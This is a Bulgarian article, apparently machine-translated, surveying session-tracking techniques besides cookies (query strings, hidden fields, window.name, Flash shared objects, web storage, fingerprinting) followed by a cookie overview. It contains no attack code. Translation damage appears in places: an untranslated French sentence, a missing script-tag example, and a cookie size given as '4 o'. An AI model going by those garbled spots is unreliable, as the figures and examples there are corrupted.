Този метод включва уеб сървъра, който добавя низови заявки към връзките на уеб страницата, която ги носи, когато се изпращат до браузъра. Когато потребителят следва връзка, браузърът връща прикачения низ на заявката на сървъра.

Низовете на заявките, използвани за тази цел, и бисквитките са много сходни, като и двете са информация, произволно избрана от сървъра и върната от браузъра. Има обаче някои разлики: когато URL адрес, съдържащ низ за заявка, се използва повторно, същата информация се изпраща на сървъра. Например, ако предпочитанията на потребителя са кодирани в низ за заявка на URL адрес и потребителят изпрати този URL адрес на друг потребител по имейл, този потребител също ще може да използва тези предпочитания.

От друга страна, когато потребителят достъпи една и съща страница два пъти, няма гаранция, че един и същ низ на заявка ще бъде използван и двата пъти. Например, ако потребител стигне до страница от вътрешна страница на сайта за първи път и стигне до същата страница от външна страница втори път, низът на заявката спрямо страницата на сайта обикновено е различен, докато бисквитките са едни и същи .

Други недостатъци на низовете за заявки са свързани със сигурността: съхраняването на данни, които идентифицират сесия в низове за заявки, позволява или опростява атаките за фиксиране на сесии, атаките с препратка към идентификатор и други експлойти. Предаването на идентификатори на сесии като HTTP бисквитки е по-сигурно.

Скрито поле на формуляр

Една форма на проследяване на сесии, използвана от ASP.NET, е използването на уеб формуляри със скрити полета. Тази техника е много подобна на използването на URL низове за заявки за пренасяне на информация и има същите предимства и недостатъци; и ако формулярът се обработва с метода HTTP GET, полетата всъщност стават част от URL адреса на браузъра, който ще го изпрати при изпращане на формуляра. Но повечето формуляри се обработват с HTTP POST, което води до добавяне на информация за формуляра, включително скрити полета, като допълнителен вход, който не е нито част от URL адреса, нито бисквитка.

Този подход има две предимства от гледна точка на проследяване: първо, проследяването на информацията, поставена в изходния HTML код и POST входа, а не в URL адреса, ще позволи на средния потребител да избегне това проследяване; второ, информацията за сесията не се копира, когато потребителят копира URL (за да запази страницата на диск или да я изпрати по имейл, например).

window.name

Всички често срещани уеб браузъри могат да съхраняват доста голямо количество данни (2MB до 32MB) чрез JavaScript, използвайки свойството window.name на DOM. Тези данни могат да се използват вместо сесийни бисквитки и се използват и в различни домейни. Техниката може да бъде съчетана с JSON обекти за съхраняване на сложен набор от променливи на сесията от страна на клиента.

Недостатъкът е, че всеки отделен прозорец или раздел първоначално ще има празен window.name; при сърфиране по раздели (отворени от потребителя) това означава, че разделите, отворени поотделно, няма да имат име на прозорец. Освен това window.name може да се използва за проследяване на посетители в различни сайтове, което може да представлява проблем за поверителността.

В някои отношения това може да бъде по-сигурно от бисквитките, поради неучастието на сървъра, което го прави неуязвим за мрежовата атака на снифър бисквитките. Въпреки това, ако се вземат специални мерки за защита на данните, те са уязвими за по-нататъшни атаки, тъй като данните са достъпни чрез други сайтове, отворени в същия прозорец.

HTTP удостоверяване

HTTP протоколът включва основните протоколи за удостоверяване на достъпа и дайджеста за удостоверяване на достъпа, който позволява достъп до уеб страница само когато потребителят е дал потребителското име и паролата. Ако сървърът поиска сертификат за предоставяне на достъп до уеб страница, браузърът го изисква от потребителя и след като бъде получен, браузърът го съхранява и го изпраща във всички следващи HTTP заявки. Тази информация може да се използва за проследяване на потребителя.

Локален споделен обект

Ако браузърът включва приставката за Adobe Flash Player, локални споделени обекти могат да се използват за същата цел като бисквитките. Те могат да бъдат привлекателен избор за уеб разработчиците, защото:

  • ограничението за размер по подразбиране за локален споделен обект е 100 KB;
  • проверките за сигурност са отделни от проверките на потребителските бисквитки (така че локалните споделени обекти могат да бъдат разрешени, когато бисквитките не са).

Тази последна точка, която отличава политиката за управление на бисквитките от тази на локално споделените обекти на Adobe повдига въпроси по отношение на управлението от страна на потребителя на неговите настройки за поверителност: той трябва да е наясно, че неговото управление на бисквитки няма влияние върху управлението на локални споделени обекти и обратното.

Друга критика към тази система е, че може да се използва само чрез плъгина на Adobe Flash Player, който е патентован и не е уеб стандарт.

Устойчивост от страна на клиента

Някои уеб браузъри поддържат базиран на скрипт механизъм за постоянство, който позволява на страницата да съхранява информация локално за по-късна употреба. Internet Explorer, например, поддържа постоянна информация в историята на браузъра, отметки, във формат, съхранен в XML, или директно с уеб страница, записана на диск. За Microsoft Internet Explorer 5 има достъпен метод за потребителски данни чрез DHTML поведение.

W3C въведе в HTML 5 нов JavaScript API за съхранение на данни от страна на клиента, наречен Уеб хранилище и има за цел да замени трайно бисквитките. Подобно е на бисквитките, но със значително подобрен капацитет и без съхраняване на информация в заглавката на HTTP заявките. API позволява два вида уеб съхранение: localstorage и sessionstorage, подобно на постоянните бисквитки и сесийните бисквитки (с изключение на това, че сесийните бисквитки изтичат, когато браузърът е затворен, докато съхранение на сесии изтичат, когато разделът е затворен), съответно. Уеб съхранението се поддържа от Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 и Opera 10.50.

Различен механизъм обикновено разчита на кеширане на браузъра (в паметта, а не на опресняване) с помощта на JavaScript програми в уеб страниците. 

Например една страница може да съдържа етикета . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

В този момент програмата остава в кеш паметта и посетената страница не се презарежда втори път. Следователно, ако програмата съдържа глобална променлива (например var id = 3243242;), този идентификатор остава валиден и може да бъде използван от друг JavaScript код, след като страницата се зареди отново или след като се зареди страница, свързваща програмата. 

Основният недостатък на този метод е, че глобалната променлива на JavaScript трябва да е статична, което означава, че не може да бъде променена или изтрита като бисквитка.

пръстов отпечатък на уеб браузър

Пръстовият отпечатък на браузъра е информация, събрана за конфигурационните настройки на браузъра за целите на идентификацията. Тези пръстови отпечатъци могат да се използват за пълно или частично идентифициране на интернет потребител или устройство, дори когато бисквитките са деактивирани.

Основната информация за конфигурацията на уеб браузъра отдавна се събира от услугите за аудитория на уебсайта с цел точно измерване на човешкия уеб трафик и откриване на различни форми на измама с кликвания. С помощта на скриптови езици от страна на клиента се събира много по-точно информация вече е възможно.

Преобразуването на тази информация в битов низ създава пръстов отпечатък на устройството. През 2010 г. Electronic Frontier Foundation (EFF) измери ентропията на пръстовия отпечатък на браузъра да бъде поне 18,1 битаи това беше преди напредъкът в отпечатъците на канава да добави 5,7 бита към тази ентропия.

Бисквитки накратко

Бисквитките са малки текстови файлове, съхранявани от уеб браузъра на твърдия диск на посетителя на уебсайта и които се използват (наред с други неща) за запис на информация за посетителя или неговото пътуване през сайта. По този начин уеб администраторът може да разпознае навиците на посетителя и да персонализира представянето на своя сайт за всеки посетител; след това бисквитките позволяват да се запомни колко статии да се покажат на началната страница или дори да се запазят идентификационните данни за влизане за всяко частно лице: когато посетителят се върне на сайта, вече не е необходимо да въвежда името и паролата си, за да бъдат разпознати, тъй като се четат автоматично в бисквитката.

Бисквитката има ограничен живот, зададен от дизайнера на сайта. Те могат да изтекат и в края на сесията на сайта, което съответства на затварянето на браузъра. Бисквитките се използват широко, за да улеснят живота на посетителите и да им представят по-подходяща информация. Но специалните техники позволяват да се проследи посетител на няколко сайта и по този начин да се събере и провери много обширна информация за неговите навици. Този метод е дал на използването на бисквитки репутация като техника за наблюдение, която нарушава поверителността на посетителите, което за съжаление отговаря на реалността в много случаи на използване по нетехнически причини или незачитане на очакванията на потребителите.

В отговор на тези основателни страхове, HTML 5 въвежда нов JavaScript API за съхранение на данни от страна на клиента, наречен Web storage, който е много по-сигурен и с по-голям капацитет, който има за цел да замени бисквитките.

Съхранение на бисквитки

С някои браузъри бисквитката може лесно да се редактира, прост текстов редактор като Notepad е достатъчен, за да промените стойностите й ръчно.

Бисквитките се запазват по различен начин в зависимост от браузъра:

  • Microsoft Internet Explorer записва всяка бисквитка в различен файл;
  • Mozilla Firefox запазва всички свои бисквитки в един файл;
  • Opera запазва всички свои бисквитки в един файл и ги криптира (невъзможно е да ги променяте, освен в опциите на софтуера);
  • Apple Safari запазва всички свои бисквитки в един файл с разширение .plist. Модификацията е възможна, но не е много лесна, освен ако не преминете през софтуерните опции.

Необходими са браузъри за поддръжка най-малкото :

  • 300 едновременни бисквитки;
  • 4 o на бисквитка;
  • 20 бисквитки на хост или домейн.
[Обща сума: 0 Означава: 0]

Написано от Редактори на рецензии

Екипът от експертни редактори прекарва времето си в проучване на продукти, извършване на практически тестове, интервюиране на професионалисти от бранша, преглед на потребителски отзиви и писане на всички наши резултати като разбираемо и изчерпателно обобщение.

Оставете коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са маркирани *

Какво мислите?

384 Точки
Upvote Downvote